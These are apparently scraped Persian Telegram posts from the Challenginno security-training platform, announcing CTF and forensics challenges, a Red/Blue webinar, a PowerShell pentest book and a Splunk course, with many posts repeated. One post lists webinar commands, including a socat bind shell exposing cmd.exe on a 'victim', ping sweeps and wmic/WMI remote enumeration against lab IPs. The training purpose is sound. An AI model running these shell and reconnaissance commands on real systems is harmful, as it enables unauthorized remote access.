✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✔️ یک تحلیلگر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش دادهاند که فعالیتهای غیرعادی مشاهده کردهاند، اما هیچ برنامهای به طور واضح در حال اجرا نیست.
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
Forwarded from securityworld
PowerShell for Pentest-Final.pdf
2.7 MB
✅ پاورشل به عنوان یک ابزار قدرتمند در سیستمعامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده میشود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time
`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
✔️ آسیبپذیری SQL Injection یکی از رایجترین و خطرناکترین نقاط ضعف امنیتی در برنامههای تحت وب است. این آسیب پذیری زمانی رخ میدهد که ورودیهای کاربر بهدرستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئریهای SQL استفاده شوند.
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✍🏻دوره Splunk Engineering
⏰مدت زمان: 36 ساعت
🧑🏻💻مدرس : احمدرضا نوروزی
📚سرفصل ها :
Deploying Splunk
Splunk Installation
Secure Splunk Enterprise
Manage Users & Roles
Monitoring Splunk
Licensing Splunk
Configuration File & Directory Structure
Manage Indexes
Manage Cluster Master & Indexers
Create Indexes.Conf
Manage Deployment Server
Configuring Basic Forwarding
Configuring Search Head Cluster & Deployer
Configuring Heavy Forwarder Cluster
Splunk Multisite Structure
📝ثبت نام از طریق :
🆔@soorin_sec
☎️09102144597
تیم سورین
⏰مدت زمان: 36 ساعت
🧑🏻💻مدرس : احمدرضا نوروزی
📚سرفصل ها :
Deploying Splunk
Splunk Installation
Secure Splunk Enterprise
Manage Users & Roles
Monitoring Splunk
Licensing Splunk
Configuration File & Directory Structure
Manage Indexes
Manage Cluster Master & Indexers
Create Indexes.Conf
Manage Deployment Server
Configuring Basic Forwarding
Configuring Search Head Cluster & Deployer
Configuring Heavy Forwarder Cluster
Splunk Multisite Structure
📝ثبت نام از طریق :
🆔@soorin_sec
☎️09102144597
تیم سورین
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✔️ یک شرکت امنیتی متوجه میشود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایلهای حساس را از سیستم خود پاک کرده است.
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✔️ قسمت Authorization Testing یکی از بخشهای کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزمهای تعیین سطوح دسترسی و Authorization در برنامههای وب میپردازد.
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ یکی از سوالاتی که همیشه در حوزه های مختلف امنیت سایبری به خصوص حوزه های Red Team و SOC مطرح بوده است، نحوه شروع به کار با فریمورک MITRE ATT&CK می باشد.
✅ فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیکها و تکنیکهای مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدلها و متدولوژیهای تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار میرود.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/mitre-attack
✅ فریمورک MITRE ATT&CK یک پایگاه دانش جهانی از تاکتیکها و تکنیکهای مهاجمان بر اساس مشاهدات واقعی است. این پایگاه دانش به عنوان بنیادی برای توسعه مدلها و متدولوژیهای تهدید در بخش خصوصی، دولت و جامعه محصولات و خدمات امنیت سایبری به کار میرود.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، سعی شده تا شما را در پاسخ به این سوال که چگونه استفاده از فریمورک MITRE ATT&CK را آغاز کنیم، راهنمایی کند.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/mitre-attack
Getting Start with MITRE ATTaCK.pdf
2.3 MB
این کتاب با هدف آشنایی شما با MITRE ATT&CK، کاربردهای آن در تحلیل تهدیدات، شناسایی نقاط ضعف، تقویت استراتژیهای امنیتی و بهبود پاسخگویی به حملات نگارش شده است.
محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum میباشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
محتوای این کتاب توسط وب سایت MITRE تهیه شده و برگرفته از مقالات Katie Nickels، John Wunder، Blake Strom، Tim Schulz و Andy Applebaum میباشد و در آن به نحوه چگونگی شروع استفاده از فریمورک MITRE ATT&CK پرداخته شده است.
✔️ عبارت Veiled Attack به یک حمله سایبری پیچیده اشاره دارد که هدف آن مخفی نگه داشتن شواهد و فعالیتهای مخرب از ابزارهای شناسایی و تحلیل است.
✅ در این سناریو، حملهکننده با استفاده از تکنیکهای مختلف مانند تغییرات پنهانی در سیستم (مانند اضافه کردن رکورد به رجیستری، ساخت پوشههای مخفی، و ایجاد فرآیندهای جعلی)، سعی میکند تا حمله را از سیستمهای امنیتی و تحلیلگران مخفی نگه دارد.
✅ هدف از این حمله پنهانسازی اطلاعات حساس و دشوار کردن شناسایی برای تحلیلگران و ابزارهای امنیتی است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/veild-attack
✅ در این سناریو، حملهکننده با استفاده از تکنیکهای مختلف مانند تغییرات پنهانی در سیستم (مانند اضافه کردن رکورد به رجیستری، ساخت پوشههای مخفی، و ایجاد فرآیندهای جعلی)، سعی میکند تا حمله را از سیستمهای امنیتی و تحلیلگران مخفی نگه دارد.
✅ هدف از این حمله پنهانسازی اطلاعات حساس و دشوار کردن شناسایی برای تحلیلگران و ابزارهای امنیتی است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/veild-attack
🔸با سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✔️ اگر به دنیای امنیت سایبری علاقه دارید و میخواهید با مبانی و مفاهیم اولیه این حوزه آشنا شوید، چالشهای پیشنیاز موجود در سایت ما گزینه مناسبی برای شروع هستند. در این آموزشها به موضوعاتی مثل شبکه، لینوکس، سیسکو، اکیتو دایرکتوری و پروتکل HTTP پرداخته شده که میتواند پایهای قوی برای پیشرفتهای بعدی شما را فراهم کند.
🔴 برای دیدن جزئیات و شروع یادگیری، از لینکهای زیر استفاده کنید.
🔰 آشنایی اولیه با شبکه
https://challenginno.ir/challenge/network-fundamental/
🔰 آشنایی با مقدمات لینوکس
https://challenginno.ir/challenge/linux-fundamental/
🔰 آشنایی با مفاهیم اکتیو دایرکتوری
https://challenginno.ir/challenge/active-directory-concepts/
🔰 آشنایی با مفاهیم اولیه سیسکو
https://challenginno.ir/challenge/cisco-concepts/
🔰 آشنایی با پروتکل HTTP - بخش اول
https://challenginno.ir/challenge/http-the-definitive-guide/
🔰 آشنایی با پروتکل HTTP - بخش دوم
https://challenginno.ir/challenge/http-the-definitive-guide-2/
✔️ اگر به دنیای امنیت سایبری علاقه دارید و میخواهید با مبانی و مفاهیم اولیه این حوزه آشنا شوید، چالشهای پیشنیاز موجود در سایت ما گزینه مناسبی برای شروع هستند. در این آموزشها به موضوعاتی مثل شبکه، لینوکس، سیسکو، اکیتو دایرکتوری و پروتکل HTTP پرداخته شده که میتواند پایهای قوی برای پیشرفتهای بعدی شما را فراهم کند.
🔴 برای دیدن جزئیات و شروع یادگیری، از لینکهای زیر استفاده کنید.
🔰 آشنایی اولیه با شبکه
https://challenginno.ir/challenge/network-fundamental/
🔰 آشنایی با مقدمات لینوکس
https://challenginno.ir/challenge/linux-fundamental/
🔰 آشنایی با مفاهیم اکتیو دایرکتوری
https://challenginno.ir/challenge/active-directory-concepts/
🔰 آشنایی با مفاهیم اولیه سیسکو
https://challenginno.ir/challenge/cisco-concepts/
🔰 آشنایی با پروتکل HTTP - بخش اول
https://challenginno.ir/challenge/http-the-definitive-guide/
🔰 آشنایی با پروتکل HTTP - بخش دوم
https://challenginno.ir/challenge/http-the-definitive-guide-2/
🔸 برای علاقهمندان به تست نفوذ وب و امنیت اپلیکیشنهای تحت وب، مجموعهای از چالشهای عملی بر پایه Web Security Testing Guide (WSTG) را طراحی کرده ایم. این چالشها فرصتی را فراهم میکنند تا مفاهیم امنیتی را بهصورت عملی تمرین کرده و مهارتهای تست نفوذ خود را در سناریوهای واقعی تقویت کنید.
🔴 جهت مشاهده چالشها مبتنی بر WSTG به لینکهای زیر مراجعه کنید:
🔰 آشنایی آسیب پذیری XSS - بخش اول
https://challenginno.ir/challenge/game-with-xss-vulnerability/
🔰 بازی با WSTG- بخش Identity Management
https://challenginno.ir/challenge/wstg-identity-management/
🔰 بازی با SSRF - بخش اول
https://challenginno.ir/challenge/server-side-request-forgery/
🔰 لابراتوار آسیب پذیری CORS
https://challenginno.ir/challenge/cross-origin-resource-sharing/
🔰 لابراتوار آسیب پذیری File Inclusion
https://challenginno.ir/challenge/local-and-remote-file-inclusion/
🔰 لابراتوار آسیب پذیری Authentication
https://challenginno.ir/challenge/authentication-testing/
🔴 جهت مشاهده چالشها مبتنی بر WSTG به لینکهای زیر مراجعه کنید:
🔰 آشنایی آسیب پذیری XSS - بخش اول
https://challenginno.ir/challenge/game-with-xss-vulnerability/
🔰 بازی با WSTG- بخش Identity Management
https://challenginno.ir/challenge/wstg-identity-management/
🔰 بازی با SSRF - بخش اول
https://challenginno.ir/challenge/server-side-request-forgery/
🔰 لابراتوار آسیب پذیری CORS
https://challenginno.ir/challenge/cross-origin-resource-sharing/
🔰 لابراتوار آسیب پذیری File Inclusion
https://challenginno.ir/challenge/local-and-remote-file-inclusion/
🔰 لابراتوار آسیب پذیری Authentication
https://challenginno.ir/challenge/authentication-testing/
📢 اطلاعیه مهم 📢
🔸سلام و عرض ادب به همه کاربران گرامی! 👋🏼
🔰ما همیشه تلاش کردهایم خدماتی باکیفیت و مناسبی را در سایت Challenginno به شما دوستان گرامی ارائه دهیم. تا امروز پلن رایگان سایت فعال بود، اما برای بهبود کیفیت خدمات و اضافه کردن امکانات جدید، از این پس سایت بهصورت اشتراکی در دسترس خواهد بود.
✅ البته کماکان بیش از 50 چالش وب سایت به صورت رایگان در اختیار شما خواهد بود.
💡 خبر خوب! برای قدردانی از حمایت شما عزیزان، تا پایان ایام عید نوروز، کاربران فعلی میتوانند با ۵۰٪ تخفیف اشتراک تهیه کنند! 🎉✨
🔹 جزئیات اشتراک و مزایای آن را میتوانید در سایت مشاهده کنید.
🔹 این تخفیف ویژه فقط تا پایان تعطیلات نوروزی فعال است، پس فرصت را از دست ندهید!
🔴 از همراهی شما سپاسگزاریم و مشتاقیم که همچنان در کنار ما باشید. ❤️
🌐 https://challenginno.ir/subscription
🔸سلام و عرض ادب به همه کاربران گرامی! 👋🏼
🔰ما همیشه تلاش کردهایم خدماتی باکیفیت و مناسبی را در سایت Challenginno به شما دوستان گرامی ارائه دهیم. تا امروز پلن رایگان سایت فعال بود، اما برای بهبود کیفیت خدمات و اضافه کردن امکانات جدید، از این پس سایت بهصورت اشتراکی در دسترس خواهد بود.
✅ البته کماکان بیش از 50 چالش وب سایت به صورت رایگان در اختیار شما خواهد بود.
💡 خبر خوب! برای قدردانی از حمایت شما عزیزان، تا پایان ایام عید نوروز، کاربران فعلی میتوانند با ۵۰٪ تخفیف اشتراک تهیه کنند! 🎉✨
🔹 جزئیات اشتراک و مزایای آن را میتوانید در سایت مشاهده کنید.
🔹 این تخفیف ویژه فقط تا پایان تعطیلات نوروزی فعال است، پس فرصت را از دست ندهید!
🔴 از همراهی شما سپاسگزاریم و مشتاقیم که همچنان در کنار ما باشید. ❤️
🌐 https://challenginno.ir/subscription
✔️ شما با شرکتی معتبر که یکی از پیشروترین شرکتها در زمینه توسعه نرمافزارهای اتوماسیون است، قرارداد تست نفوذ منعقد کردهاید.
✅ تیم مهندسی آنها از یک سیستم CI/CD برای مدیریت Build ها و Deploy های خود استفاده میکند. اما با توجه به اسکنهای انجام شده و همچنین بررسی نتایج آنها، به نظر میرسد که یکی از سرورها به درستی پیکربندی نشده و دارای آسیبپذیری میباشد.
✅ آسیبپذیری با CVE در سال 2024 منتشر شده و فلگ نیز در درایو C در یک پوشه قرار دارد. البته دسترسی به آن کمی سخت است و برای خواندن آن باید از قابلیتهای نرم افزار CI/CD موجود و همچنین دانش خود در زمینه تست نفوذ استفاده کنید.
🔴 این چالش رایگان بوده و شما می توانید برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/vulnerable-service-6-ci-cd
✅ تیم مهندسی آنها از یک سیستم CI/CD برای مدیریت Build ها و Deploy های خود استفاده میکند. اما با توجه به اسکنهای انجام شده و همچنین بررسی نتایج آنها، به نظر میرسد که یکی از سرورها به درستی پیکربندی نشده و دارای آسیبپذیری میباشد.
✅ آسیبپذیری با CVE در سال 2024 منتشر شده و فلگ نیز در درایو C در یک پوشه قرار دارد. البته دسترسی به آن کمی سخت است و برای خواندن آن باید از قابلیتهای نرم افزار CI/CD موجود و همچنین دانش خود در زمینه تست نفوذ استفاده کنید.
🔴 این چالش رایگان بوده و شما می توانید برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/vulnerable-service-6-ci-cd